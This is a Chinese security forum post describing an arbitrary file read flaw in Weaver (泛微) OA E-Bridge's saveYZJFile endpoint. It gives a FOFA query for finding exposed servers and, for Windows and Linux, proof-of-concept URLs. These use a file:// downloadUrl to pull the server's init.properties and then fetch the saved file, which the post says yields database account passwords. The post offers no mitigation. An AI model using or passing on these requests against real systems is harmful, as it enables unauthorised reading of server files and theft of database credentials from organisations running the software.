安全矩阵

 找回密码
 立即注册
搜索
查看: 71|回复: 0

泛微OA E-Bridge saveYZJFile 任意文件读取漏洞

[复制链接]

215

主题

215

帖子

1170

积分

金牌会员

Rank: 6Rank: 6

积分
1170
发表于 2023-1-3 11:33:36 | 显示全部楼层 |阅读模式
泛微OA E-Bridge saveYZJFile 任意文件读取漏洞
fofa:title="泛微云桥e-Bridge"

windows使用POC读取配置文件,第二个POC修改id即可得到数据库账户密码

  1. http://{{Hostname}}/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties&fileExt=txt

  2. http://{{Hostname}}/file/fileNoLogin/d6ceeee095014742a3fa151382c7d77e
复制代码


linux使用POC读取配置文件,第二个POC修改id即可得到数据库账户密码
  1. http://{{Hostname}}/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///weaver/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties&fileExt=txt

  2. http://{{Hostname}}/file/fileNoLogin/173ee2bb1dd34e739fd0d74860612f17
复制代码



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2023-1-30 00:02 , Processed in 0.010269 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表